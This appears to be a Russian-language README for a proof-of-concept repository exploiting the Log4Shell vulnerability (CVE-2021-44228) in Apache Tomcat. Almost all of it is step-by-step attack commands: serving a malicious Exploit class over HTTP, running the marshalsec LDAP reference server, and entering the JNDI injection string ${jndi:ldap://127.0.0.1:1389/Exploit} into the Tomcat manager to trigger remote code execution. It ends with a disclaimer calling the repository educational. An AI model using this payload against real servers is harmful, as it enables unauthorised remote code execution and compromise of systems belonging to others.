
POC уязвимости Log4j2 CVE-2021-44228 в Apache Tomcat

git clone
cd apache-tomcat-10.0.14/bin
startup.bat
cd exploit
py -m http.server 8888
cd exploit
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
Введите ${jndi:ldap://127.0.0.1:1389/Exploit} в поле 'XML Configuration file path' в приложении менеджера http://localhost:8080/manager/html
Класс эксплойта загружается, и происходит RCE (откроется приложение «Калькулятор»)
Репозиторий — это всего лишь POC, созданный в образовательных целях. Владелец репозитория не несёт ответственности за любой нанесённый ущерб. Как моральная заметка: не будьте злыми.
LDAP-эксплойт https://github.com/mbechler/marshalsec